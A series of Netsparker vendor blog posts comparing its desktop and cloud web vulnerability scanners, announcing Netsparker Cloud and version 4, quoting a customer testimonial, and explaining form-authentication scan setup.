Both the Netsparker Desktop (a.ka. Netsparker Web Application Security Scanner) and Netsparker Cloud are built around the same crawling and false positive free scanning technology. Therefore in terms of web applications coverage, detection of vulnerabilities and security flaws you will always get the same results from both solutions. And as we all know, Netsparker has an industry leading scanning technology.

Overview of Both Netsparker Web Application Security Scanners

The main differences between the desktop and online scanners of Netsparker are the features, which of course define their scope. The desktop edition of Netsparker was built for those who mostly do penetration tests on their own, and scan a medium number of websites. Although we have seen a number of implementations where multiple installations of the Netsparker Desktop edition are being used to scan hundreds of websites on a monthly basis.

The desktop edition of Netsparker Web Application Security Scanner

Netsparker Cloud is specifically built for large organizations who would like to scan many websites and web applications and ensure their security in the long run. By many we also mean in the hundreds and thousands of web applications. Netsparker Cloud is a multi user platform that has several features and tools that allow big teams to collaborate. This does not mean smaller organizations cannot use Netsparker Cloud though.

The dashboard of Netsparker Cloud online web application security scanner

Scalability of Service

This is the major difference between both scanners. The resources of Netsparker Desktop are limited to the specifications of the hardware it is running on. It was designed to scan one or a few web applications at a time. If you would like to scan multiple websites at the same time you can manually launch multiple instances of the desktop scanner. On the other hand Netsparker Cloud is a hosted web vulnerability scanner hence it is not limited in terms of resources. It has virtually unlimited amount of resources thanks Amazon’s Cloud (AWS) infrastructure and can scan thousands of web applications and websites at the same time.

Feature Highlight: Website Groups

In Netsparker Cloud you can group websites. This allows you to configure generic scan settings for all the websites in a group, launch a web security scan against all the websites with just a single click and also schedule automated security scans of all websites in that group.

Grouping websites in Netsparker Cloud

Keeping Up with the Latest Web Security Threats

Follow us on our web application security blog and you will notice that we frequently release software updates. Infact the list of vulnerabilities checks of the Netsparker scanning engine is ever growing. It is our duty to release frequent updates and ensure that all Netsparker users can scan their web applications against the latest security threats and vulnerabilities. The response time for releasing new security checks is also critical especially when a critical vulnerability such as Shellshock is discovered and being exploited in the wild.

In case of Netsparker Desktop, each time you launch the scanner it will check for updates and advice you should there be any available. Very practical solution, it only takes a minute or two to get the latest updates. With Netsparker Clouds things are even easier, it is maintenance free service. As soon as we discover something new, we update the service ourselves from a central location and the updates are automatically available for you.

Web Security Scanners Adaptability

Typically desktop software is far more configurable than an online service. The reason is because an online service is built around an engine that is designed to cater for a wider variety of customers hence it has less configurable parameters, resulting in a number of limitations. This is not the case with the Netsparker scanners. Anything that can be configured in Netsparker Desktop can be configured in Netsparker Cloud, such as the URL rewrite rules and other crawling options, HTTP connection properties and all the other scan policy settings.

Configuring Scan Policy in Netsparker Cloud

Team Collaboration

Netsparker Desktop is designed for a single user; a desktop application that can only be run by the user who has access to the computer where it is installed. Netsparker Cloud is a multi user environment, therefore all your team members can have their own user under the same Netsparker Cloud account and launch web application security scans, view reports etc. As an administrator you can configure different privileges for each user, hence some of them can be configured to view scan results and reports only, while others manage a websites group etc.

Multiple users in a Netsparker Cloud account

Feature Highlight: Vulnerability Management and Tasks

Like in a bug tracking system, in Netsparker Cloud you can assign identified vulnerabilities as tasks to a team member so they can remediate the vulnerability. Such feature is definitely a must have especially when you need to keep track of the security of many web applications.

Assigning a vulnerability as a task in Netsparker Cloud

Once the issue is marked as fixed from the developer, Netsparker Cloud will automatically rescan the website just for that vulnerability. If the vulnerability is fixed the task is automatically closed though should the website be still vulnerable, Netsparker Cloud will reopen the task and reassign it to the developer.

The vulnerability management system is designed to ensure every user knows what needs to be done and for the results and fixes to be checked automatically by Netsparker Cloud. If you already have a bug tracking solution and want to use it Netsparker Cloud can be integrated with your own bug tracking solutions as well.

User's To Do List (Vulnerabilities Assigned as Tasks) in Netsparker Cloud

Web Application Security Scans in Your SDLC

Both the desktop and cloud editions of Netsparker can be easily integrated within your SDLC and Continuous Integration process. Netsparker Desktop has command line support; you can easily write scripts which can be triggered by other applications and launch automated scans. Netsparker Cloud has an extensive and well documented API which you can use to trigger any type of action you can do from the Netsparker Cloud dashboard.

Keeping Web Applications Secure

Launching a single web application security scan and remediating the identified vulnerabilities can be quite difficult. It is even more difficult and demanding to frequently scan all web applications and ensure that all vulnerabilities are remediated, or even worse, that the applied fixes do not open new security flaws. Keeping track of all the changes and fixes in web applications is vital to better understand how to address specific vulnerabilities and security issues.

If you are using Netsparker Desktop you can compare different scan results of the same website. This allows you to pinpoint the differences between the web application security scans and keep track of all the issues. It is very easy to compare different scan results, though it can consume a lot of time and become a confusing process when you have a lot of websites.

And this is where Netsparker Cloud shines. As explained earlier in this article Netsparker Cloud was designed to help you scan and keep track of the security state of many web applications. It has trending and correlated reports which are automatically updated each time a website or web application is scanned. Hence you do not need to manually compare results but can easily get an overview of what is happening on the website in terms of vulnerabilities and fixes from these reports.

Trend Matrix in Netsparker Cloud

Manual Crawling and Security Scanning

From time to time you might need to manually crawl a website or a section of it. To do so you need to proxy the traffic through the scanner so it will capture it, identify attack surfaces and then scan them. Netsparker Desktop can be used for manual crawling though Netsparker Cloud cannot, it is a cloud based product. I am sure you understand the implications of why such a service cannot be used for manual browsing. Though do not fret if you are a Netsparker Cloud user and you need to do manual crawling.

Even though manual crawling is not supported in Netsparker Cloud you can still achieve the same results. You can configure a browser to proxy the traffic through a local proxy such as Fiddler for example and capture the traffic. Once you capture all the traffic you can import the Fiddler capture to Netsparker Cloud and launch the scan. Your experience won’t be the same and interactive as with Netsparker Desktop, but it will do the job when manual request entry is required.

Cloud or Desktop Web Application Security Scanner?

I am sure that by now that you have a better understanding of both Netsparker Desktop and Netsparker Cloud. To summarize, if you are a small team and do not have many websites to take care of, and you want to be more hands on with your scans; Netsparker Desktop is your best candidate. If on the other hand you operate in a big team and have many websites and web application to secure, and need all the right tools to ensure both collaboration between all team members and the security of all web applications, Netsparker Cloud ticks all the checkboxes for you.

Should you wish and have the time for it, I still recommend you to try them both. You can download a demo of Netsparker Desktop and apply for a free trial of Netsparker Cloud.

DirectDefense Use Netsparker for Automatic Web Application Security Scans Because it is Accurate and Fast

0
0

Netsparker continually executes scans in a more optimized way and delivers actionable results every time. The false-positive free scanning, means that Netsparker has already attempted to validate the finding for itself before it provides the results, thus eliminating the need for our consultants to spend time chasing down false positives.Jim Broome, President, DirectDefense.

DirectDefence LogoFounded in 2011, DirectDefense offers security services that are unmatched within the industry. Their core strength is the deep experience in performing security assessments for a wide array of networks, platforms, applications and web applications. DirectDefense’s seasoned consultants are focused on providing world-class security services to their clients. Regardless of industry – aerospace, financial, insurance, retail, hospitality, healthcare, education, gaming, technology or energy and utilities, the wealth of knowledge and experience DirectDefense has assists their customers in achieving their security testing and strategy goals.

Fast and Accurate Automated Web Application Security Scans

As part of their service offerings, DirectDefense provide web applications penetration tests. At a minimum they analyse around 300 web application a month, hence speed and accuracy are major key factors when it comes to web application security. If the tools they use are slow they cannot keep up with the demand and If they report false positives, consultants will waste precious time verifying the scanner findings.

The Right Automated Web Application Security Scanner

DirectDefense have been using automated web application security scanners since the early days. They have used all of them but since 2011 they started using Netsparker as their main scanner, and prefer to use it unless they are required to use another solution based on their customer’s requirements.

When asked why they use Netsparker Web Application Security Scanner; “In a simple word, SPEED. Netsparker continually executes scans in a more optimized way and delivers actionable results every time. The false-positive free scanning, means that Netsparker has already attempted to validate the findings for itself before it provides the results, thus eliminating the need for our consultants to spend chasing down false positive findings,” said the president of DirectDefense Jim Broome. “This lets our consultants focus on refining their testing and validation of existing vulnerabilities and provide quicker results to our customers.”

Benefits of Netsparker Web Application Security Scanner

Speed, automation and accuracy are some of the reasons why a security firm such as DirectDefense uses an automated web vulnerability scanner, and as per Mr Broome’s words Netsparker has it all;

Speed: It is easy to configure and is one of the faster scanners with regards to scan completion.

Automation: Netsparker is easy to automate and can successfully complete batch scans of 100’s of websites and web applications.

Accuracy: Netsparker produces accurate results time and time again, and when its not 100% sure on a finding, it tells you so. This allows a tester or a consultant to focus on which areas to validate and which areas already have proof of a vulnerability.

The Need to Detect all Technical Vulnerabilities on All Type of Frameworks

Accuracy and adaptability are as important as speed and automation when your clientele consists of major banks and financial institutions. Having such a varied clientele, DirectDefense has seen it all. As Mr Broome says “You name it, we have scanned it!” It could be a .NET, PHP, Spring, Struts or Java web application running on Apache, NGinx or IIS. DirectDefense has seen it and scanned it with Netsparker.

“Netsparker consistently finds and validates SQL injection vulnerabilities faster than any scanner we have ever used. Be it a banking application or a cloud based CRM application, we recommend continual testing, and Netsparker is such a tool to assist with meeting these requirements,” stated DirectDefense’s president.

World Class Support is Another Important Requirement

It is a must to use the right security tools when scanning web applications if you do not want to miss a vulnerability. A malicious attacker only needs to exploit a single vulnerability to gain unauthorized access to the web application and the sensitive data it stores. Web application security is a critical business and one should not forge ahead alone. Hence world class support is also another vital requirement security experts such as DirectDefense have when choosing their tools.

The Netsparker support department is known for its world class support, and Mr Broome confirms this. “Yes, if you have a complex issue or even one that is simple to resolve, the Netsparker support staff is there. Don’t be surprise if you get emailed from Ferruh (the CEO) with recommendations and suggestions.”

He couldn’t have said it better. We thrive to deliver world class support, and if need be even our CEO, who is a seasoned penetration tester himself gets involved in support tickets.

About DirectDefense

Founded in 2011, DirectDefense offers security services that are unmatched within the industry. Our core strength is our deep experience in performing assessments for a wide array of networks, platforms, and applications. Our seasoned consultants are focused on providing world-class security services to our clients.

Regardless of industry – financial, insurance, retail, hospitality, healthcare, education, gaming, technology, or energy and utilities, our wealth of knowledge and experience can assist you in achieving your security testing and strategy goals.

About Netsparker

Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive web application security scanners Netsparker Desktop and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products. Founded in 2009, Netsparker's automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank and Ernst & Young.

Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank and Ernst & Young.
Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank and Ernst & Young.

Netsparker Web Application Security Scanners to be Exhibited at the RSA Conference 2015 in USA

0
0

RSA Conference 2015We will be exhibiting at the RSA Conference 2015, which will be held at the Moscone Center in San Francisco between the 20th and the 24th of April 2015. Come and pay us a visit at booth 4330 in the North Hall.

We will be more than happy to meet you and answer any queries you might have about using any of the Netsparker Web Application Security Scanners to automatically identify vulnerabilities and security flaws in your websites and web applications. During he RSA we will also be showcasing the all new Netsparker Cloud, our new false positive free online web application security scanner.

Visit the RSA Conference website for a copy of the agenda and for more information about the workshops and tracks that will be held. We also have a number of complimentary exhibit hall only passes, so get in touch with us if you would like one.

Don't forget to drop by our stand for more information on how Netsparker can help you keep mnalicious hackers at bay and to say hi.

Looking forward to meet you there!

https://netsparker.highrisehq.com/people/158901946-robert-abela

Netsparker's All New Online Web Application Security Scanner Netsparker Cloud is Here

0
0

After a good number of months of late nights and endless supply of coffee, many beta testers and discussions about adding or removing specific features, we are happy to announce that Netsparker Cloud, the new online web application security scanner is officially released and available for all of you.

Netsparker Cloud Interface

What is Netsparker Cloud?

The name says it all; Netsparker Cloud is an online web application security scanner built on top of AWS (Amazon Web Services), guaranteeing the best possible performance and scalability. You can scan hundreds or thousands of web application in just a few hours and all the results will be correlated, easy to access and act on.

The service uses the already proven scanning technology of the desktop edition of Netsparker. Therefore we guarantee you that it will detect the most vulnerabilities, as shown in Shay Chen’s last independent web vulnerability scanners comparison, and it reports no false positives.

Netsparker Cloud Features Highlights

Another online web security scanner on the market? No, Netsparker Cloud is different. It brings a lot to the table especially for large organizations who would like to ensure the security of hundreds and even thousands of websites and web applications. Netsparker Cloud can also be used by small businesses, though as explained in this post it has a good number of features that help organizations ease the job of securing their web applications.

Easy to Use and False Positive Free

Even though easy to use products and false positive free web security scanning technology has become synonymous with the Netsparker brand, it is still very important to talk a bit about them and  to remind users and business owners how much their organization can benefit from such features.

Easy to Use Web Security Service

Web application security is not exactly a straightforward process, hence by using easy to use products you ensure that you and your team can focus on securing web applications and not figuring out how to use the tools.

Easily Scan Password Protected Websites

Once we are speaking about ease of use of security tools, allow me to show you how you can configure form authentication, so Netsparker Cloud can scan a password protected area in your website. Most probably you have seen how it works with other tools, where you have to record a login macro, or contact support to configure it for you. With Netsparker Cloud it is as simple as specifying the login form URL and username and password and the service will figure out everything by itself.

Configuring Netsparker Cloud to scan a password protected website

If you are using Client Certificate, NTLM, Basic or Digest authentication simply tick the checkbox and specify the credentials. Yes it is that simple.

False Positive Free Web Security Scan Results

Every security professional will tell you that false positives are a big detriment in the web application security industry. If you use a tool that reports a lot of false positives that you have to manually verify, then what is the use of automating the process? Might as well audit the web application manually, which is of course an impossible feat considering the complexity and size of today’s web applications. And we designed Netsparker’s scanning technology, which is used in both Netsparker Cloud and Desktop with this in mind. Hence Netsparker Cloud is a false positive free online web security scanning service.

Multi-User Platform

One of the biggest problems in the security process is bringing everyone to the speed, keeping developers responsible and having a good communication channel between security and developments teams good. Since it is a multi-user platform, Netsparker Cloud allows teams in large organizations easily collaborate between them to ensure that all web applications are scanned and all identified vulnerabilities are closed down.

Netsparker Cloud is a multi-user platform that allows all team to collaborate

There is no limit to how many users you can create for each account and the main account holder can configure different privileges for each created user, ensuring that every user only has access to what they need to do the job. Refer to Ease Collaboration and Improve Productivity with Netsparker Cloud for more information on the multi-user feature.

Vulnerability Management To Ease Fixes

Netsparker Cloud has a built in vulnerability management system which allows team members to assign vulnerabilities as tasks to others, thus ensuring everyone knows what needs to be done. Similar to a bug tracking system, this feature really helps in ensuring all vulnerabilities are remedied.

Team members can assign vulnerabilities as task to developers so they can be fixed

Once a vulnerability is marked as fixed Netsparker Cloud will automatically scan the web application to ensure the fix. Should it not be fixed, the task will be automatically reassigned to the developer. Read Vulnerability Management and Remediation for more information on this handy feature. And if instead you would like to continue using your existing bug tracking system, that is fine as well as Netsparker Cloud can be easily integrated with it.

Fully Configurable Web Security Scanning Service

Even though Netsparker Cloud is an online service it is a fully configurable online web security scanning service. In terms of configuration it is the same as Netsparker Desktop, there are no limitations to the type of scan settings you can configure, or which scan policy or URL rewrite rules to use for a web vulnerability scan.

Easily Manage the Security of Many Websites

In Netsparker Cloud you can create and use groups to group websites. By grouping websites you can configure specific scan  policies and settings that can be used to scan the websites, or scan a group of websites at the same time. Groups also allow you to easily get an overview of the security state of a number of websites in the group, rather than having to manually sift through thousands of scan results.

Integrate Web Security Scanning in Your SDLC

Integrating Netsparker Cloud in your SDLC and Continuous Development is very easy and secure; an API token is used for each user and all type of actions such as launching a new web application security scan and getting the results of a scan can be triggered via the API. Detailed API documentation is available in Netsparker Cloud.

Apply for a Netsparker Cloud Trial

The above list is just an overview of what is new in Netsparker Cloud. See for yourself how much time and resources your business can save when using Netsparker Cloud to ensure the security of all websites and web applications. Apply for a Netsparker Cloud trial and your region’s product specialist will get in touch and sort out a free full trial.

We Would Like to Hear From You

As much as we are happy with this new release of Netsparker Cloud, we are also excited with what lies ahead. Even though we are confident that Netsparker Cloud has already raised the bar for online web application security scanners, we are sure that there is a lot that still needs to be done therefore we would like to hear from you. Go ahead and apply for a Netsparker Cloud trial and let us know what you think of it. Visit the Netsparker Cloud product page and Netsparker Cloud benefits page  for more information about the features of Netsparker cloud and the benefits your business can take advantage of when securing web applications with Netsparker Cloud.

Netsparker 4 - Easier to Use, More Automation and Much More Web Security Checks

0
0

We are happy to announce a new major version update of the desktop edition of our scanner; Netsparker Web Application Security Scanner version 4. The main highlight of this new version is the new fully automated Form Authentication mechanism; it does not require you to record anything, supports 2 factor authentication and other authentication mechanisms that require a one time code to work out of the box.

The below is a list of features highlights of the new Netsparker Web Application Security Scanner version 4.

Configuring New Web Application Security Scans Just Got Easier

This is the first thing you will notice when you launch the new version of Netsparker Desktop; a more straightforward and easier to use New Scan dialog. Easy to use software has become synonymous with Netsparker’s scanners and in this version we raised the bar again, giving the opportunity to many users to launch web security scans even if they are not that familiar with web application security.

The Start a New Scan dialog in Netsparker Desktop has been simplified

As seen in the above screenshot all the generic scan settings you need are ergonomically placed in the right position, allowing you to quickly configure a new web application security scan. All of the advanced scan settings, such as HTTP connection options have been moved to scan policies.

Revamped Form Authentication Support to Scan Password Protected Areas

The new fully automated form authentication mechanism of Netsparker Desktop emulates a real user login, therefore even if tokens or other one time parameters are used by the web application an out of the box installation of the scanner can still login in to the password protected area and scan it. For example in the below example Netsparker is being used to login to the MailChimp website.

Configuring form authentication in Netsparker is very simply. Just specify a URL and the credentials

Once you enter the necessary details, mainly the login form URL and credentials you can click Verify Login & Logout to verify that the scanner can automatically login and identify a logged in session, as shown in the below screenshot.

Use the Verify Login and Logout button to verify that the scanner can login automatically and identify a logged in session

You do not have to record any login macros because the new mechanism is all based on DOM. You just have to enter the login form URL, username and password and it will automatically login to the password protected section. We have tested the new automated form authentication mechanism on more than 300 live websites and can confirm that while using an out of the box setup, it works on 85% of the websites. 13% of the remaining edge cases can be fixed by writing 2-5 lines of JavaScript code with Netsparker’s new JavaScript custom script support. Pretty neat, don’t you think? The below are just a few of the login forms we tested.

Few of the login forms we tested with the new automated forms authentication mechanism

The new Form Authentication mechanism also supports custom scripts which can be used to override the scanner’s behaviour, or in rare cases where the automated login button detection is not working. The custom scripting language has been changed to JavaScript because it is easier and many more users are familiar with it.

Out of the Box Support for Two-Factor Authentication and One Time Passwords

The new Form Authentication mechanism of Netsparker Desktop can also be used to automatically scan websites which use two-factor authentication or any other type of one time passwords technologies. Very simple to configure; specify the login form URL, username and passwords and tick the option Interactive Login so a browser window automatically prompts allowing you to enter the third authentication factor during a web application security scan.

Interactive Form Authentication allows users to scan web applications using two-factor authentication or one time passwords and tokens

Ability to Emulate Different User Roles During a Scan

To ensure that all possible vulnerabilities in a password protected area are identified, you should scan it using different users that have different roles and privileges. With the new form authentication mechanism of Netsparker you can do just that! When configuring the authentication details specify multiple usernames and passwords so in between scans you just have to select which credentials should be used without the need to record any new login macros or reconfiguring the scanner.

In the form authentication configuration you can specify multiple users which have different roles

Automatically Identify Vulnerabilities in Google Web Toolkit Applications

Google Web Toolkit, also known as GWT is an open source framework that gained a lot of popularity. Nowadays many web applications are being built on it, or using features and functions from it. Since the web applications that are built with GWT heavily depend on complex JavaScript, we built a dedicated engine in Netsparker to support GWT.

This means that you can use Netsparker Desktop to automatically crawl, scan and identify vulnerabilities and security flaws in Google Web Toolkit applications.

Netsparker identified an SQL injection vulnerability in a Google Web Toolkit application

Identify Vulnerabilities in File Upload Forms

Like with every version or build of Netsparker we release, we included a number of new security checks in this version. Though one specific web application security check that is included in this version needs more attention that the others; file upload forms vulnerabilities.

From this version onwards Netsparker Desktop will check all the file upload forms on your websites for vulnerabilities such forms are typically susceptible for, for example Netsparker tests that all proper validation checks in a file upload form work and that they cannot be bypassed by malicious attackers.

An unrestricted file upload form reported in Netsparker

Mixed Content Type, Cross-Frame Options, CORS configuration

We also added various new web security checks mostly around HTML5 security headers. For example Netsparker now checks for X-Frame-Options usage, and possible problems in the implementation of it which can lead to Clickjacking vulnerabilities and some other security issues.

Another new check is checking the configuration of CORS headers. Finally in this category we added Mixed Content Type checks for HTTPS pages and Content Type header analysis for all of the pages.

XML External Entity (XXE) Engine

Applications that deal with XML data are particularly susceptible to XML External Entity (XXE) attacks. A successful exploitation of a XXE vulnerability allows an attacker to launch other and more grievous malicious attacks, such as code execution. Since this version, Netsparker automatically checks websites and web applications for XXE vulnerabilities.

Insecure JSONP Endpoints - Rosetta Flash & Reflected File Download Attacks

In this version we added a new security check to identify insecure JSONP endpoints and other controllable endpoints that can lead to Rosetta Flash or Reflected File Download attacks.

Even if your application is not using JSONP you can be still vulnerable to these type of attacks in other forms, hence why it is always important to scan your website with Netsparker.

Other Netsparker Desktop 4 Features and Product Improvements

The above list just highlights the most prominent features and new security checks of Netsparker Desktop version 4, the only false positive free web application security scanner. Included in this version there are also more new security checks and we also improved several existing security checks, hence the scanner’s coverage is better than ever before. Of course we also included a number of product improvements.

Since there have been a good number of improvements and changes in this version there are also some things from older versions of Netsparker which are no longer supported, such as scan profiles. Because we changed the way Netsparker saves the scan profiles, scan profiles generated with older versions of Netsparker will no longer work. Therefore I recommend you to check the Netsparker Desktop version 4 changelog for more information on what is new, changed and improved.

Upgrading Netsparker Web Application Security Scanner

If you are already using Netsparker Web Application Security Scanner, a pop up window with the upgrade details will pop up the next time you run Netsparker. Alternatively you can click Check for Updates from the Help drop down menu to force manual updates.

If you have problems with the upgrade or product related queries, get in touch with our awesome support team by sending us an email on support@netsparker.com.

How to Scan Websites with Form Authentication with Netsparker Desktop

0
0

Netsparker New Automated Form Authentication Support

In Netsparker Desktop we introduced a new form authentication mechanism that makes it easier to configure scans for websites which require user authentication. The goal was to provide the user with an easy to use and error-prone system for configuring form authentication in Netsparker.

How Netsparker Form Authentication Was Working Previously

Prior to version 4, Netsparker had a HTTP-macro based form authentication mechanism where you had to interactively record the sequence of your website’s form authentication. Netsparker was replaying this macro sequence to login to your website during the scan. Since this method replays the HTTP requests exactly in the order they are recorded with the exact parameter values, it was failing on websites which use token-like parameters due to cached reuse of token parameter values.

Netsparker had a powerful scripting capability which you could use to manipulate each request before it is issued but writing custom scripts would require knowledge of a .NET programming language (C# or VB.NET) and also knowledge of the Netsparker Authentication API. Also dealing with nitty-gritty details of HTTP requests, especially for cases where there are dozens of them, was not an ideal solution.

Form Authentication Support in Netsparker

The new form authentication mechanism introduced in Netsparker Desktop 4 approaches this problem from a completely different way and tries to solve it thinking out of the box, so to say. Netsparker 4 tries to fill and submit the login forms on your websites by means of the DOM of the login form page, i.e. without the need to record any login macros. It automatically detects the login form components, the username & password inputs, populates them and submits the login form. To do this, you only need to configure the following (as shown in the below screenshot):

  • Login form URL

  • Credentials (username & password)

To configure form authentication in Netsparker simply specify the login form URL and credentials

How to Select a Login Form URL

The login form URL that should be configured in Netsparker is the URL of the page where your login form resides. Most websites these days have URLs like http://www.example.com/Login/ for their users to authenticate. It is also common for websites to have their login form on their homepages, usually somewhere located in the header or side bar part. If this is the case, specify your website’s home page URL in Netsparker as the login form URL. Netsparker has a better chance of detecting and filling the login form on pages dedicated to the login operation, so always specify the dedicated login form URL if you have a login form both on your homepage and on a dedicated login page.

Configuring Credentials and Multiple Persona Support

The other piece of information Netsparker requires for authenticating during a web application security scan are the credentials. As seen in the below screenshot you can enter more than a single set of credentials to simulate different kind of personas your website supports, i.e. one for regular users and one for admin users. This way, you will be able to easily switch between accounts and performs authenticated scans with different user accounts which have different privileges.

Configure multiple sets of credentials to easily run authenticated scans using different users with different privileges

Verifying the Form Authentication Configuration by Simulating the Login and Detecting the Logout Pattern

Configuring form authentication is that simple! Once ready just click the Verify Login & Logout button and Netsparker will use the provided information to authenticate to your website. During the verification process, which is required to perform authenticated scans you will confirm that Netsparker is able to:

  1. Authenticate with the provided configuration

  2. Detect the difference between a logged in and logged out session

You can verify the form authentication configuration either while configuring it or before starting a scan; Netsparker will prompt you to perform the verification process if it is not already performed prior to starting the scan. Verifying the logout detection pattern is crucial because Netsparker will try to detect this pattern during the scan and when this pattern is matched, it will try to re-authenticate automatically to the website before proceeding with any other crawling or attacking requests, ensuring the password protected section is completely scanned. There are 2 types of logout detection patterns that Netsparker identifies:

  1. Redirect-based

  2. Keyword-based

Logout Detection

Redirect-based logout detection

A great deal of websites redirect the users back to the login form page when a restricted page is requested anonymously, without any valid session. If your website does so, Netsparker will detect a Redirect-based logout. To do this, Netsparker makes an anonymous request to a login required URL and identifies a Redirect-based logout if a HTTP 30x redirect response is detected. Netsparker simply uses the last URL that the form authentication simulation requested as the login required URL. For example, the form authentication simulation may use a URL like http://mysite.com/Dashboard/ which is a very good candidate as a login required URL.

Keyword-based logout detection

Some other websites do not issue a redirect when an anonymous request to a login required URL is performed, or the identified login required URL displays a page that is very similar to the authenticated page. In such cases Netsparker will detect and use a Keyword-based logout. This type of logout detection identifies a logged out session by searching for specified keywords in the HTTP responses. Therefore if all of the specified keywords are found in a response, Netsparker determines that the session is currently logged out, or has been invalidated.

Interactive login

Support for CAPTCHA, One Time Tokens and Two Factor Authentication Mechanisms

Many modern websites and web applications use CAPTCHA, Two factor authentication and other similar mechanisms for user authentication. Such mechanisms require you to enter a one time pin, code or other data during the authentication process, which typically is not available at the time of configuration. Netsparker supports these mechanisms through the use of the “Interactive login” feature. By checking the check box Interactive Login in the form authentication configuration, Netsparker will automatically pop up an interactive browser window during the authentication so you can perform any necessary operations to allow the authentication, be it entering a CAPTCHA or PIN sent as an SMS.

The interactive login feature allows you to specify a one time password, token or captcha phrase during an automated web application security scan.

Below are some scenarios where you can use the Interactive login feature:

  • The website requires a CAPTCHA (to be solved during authentication or to access a particular area)

  • The website requires you to enter a dynamic token value like a 2FA PIN during authentication

  • You are not able to configure Netsparker to fill the login form and want to manually perform authentication (i.e. the login form is rendered as a Flash/Silverlight/Java Applet embed in browser)

You can also mix and match the Interactive login functionality with automatic login capability and custom scripting support. For example imagine having a website requiring you to enter a regular username and password on the first page and a 2FA PIN on second page. In such case you can configure the credentials and enable the Interactive login option, therefore Netsparker will first submit the regular login form details and then will prompt you with the interactive login browser allowing you to enter the 2FA PIN.

Combining the Use of Multiple Website Authentication Mechanisms

Configure multiple authentication mechanisms at once so they are used together during a scanIf your form authentication pages also require other type of authentication such as basic or client certificate, you can simply configure the settings together with the form authentication settings in the Start a New Scan dialog. When you configure them Netsparker will automatically use all the configured information when accessing the form authentication pages during a web application security scan.

Custom Scripts for Form Authentication in Netsparker

There will be cases where you need to tweak the Netsparker automatic authentication, or it will not work for your website. Do not fret; with the help of custom scripting support, you can automate the form authentication process of your websites easily. Here are some of the cases where you may need custom scripting:

  • The login form is not a regular login form with 2 input fields, for example you need to select a department from a select box or a drop down menu

  • The submit button on login form is not a regular HTML button

  • There are multiple forms in the login form page and Netsparker is unable to detect the correct form. For example Netsparker locates the signup form which is on the same page

  • The login form page is not present in the DOM by the time the page loads, but you need to click a link to make login form appear on page, usually in a virtual login dialog

  • The authentication process consists of several page navigations; you need to first visit a page to get a cookie and then visit another to enter the username and then yet another to enter the password

  • Netsparker is unable to locate the login form for various other reasons.

Custom scripts for form authentication in Netsparker can be written with the JavaScript language, which many professionals are familiar with. Netsparker executes the JavaScript code in the context of form authentication pages, where you can access and manipulate the page DOM. The code will be executed by the time the page is fully loaded. You can use any HTML API that modern browsers support to locate the login form elements and fill them.

The Custom Script editor provides you with a convenient environment to author your custom scripts. It mainly consists of 3 parts: A script editor, an embedded browser view and a developer tools pane.

Use the custom script editor to write scripts for form based authentication

You can write your scripts in the script editor on left. Any HTML/JavaScript/DOM API that is supported on a modern browser is supported here too. Additionally, you can use some of the helper functions provided by Netsparker in ns.auth namespace. These functions will help you to fill input values, click elements, etc. You can read more about how to call these functions in the Form Authentication API documentation.

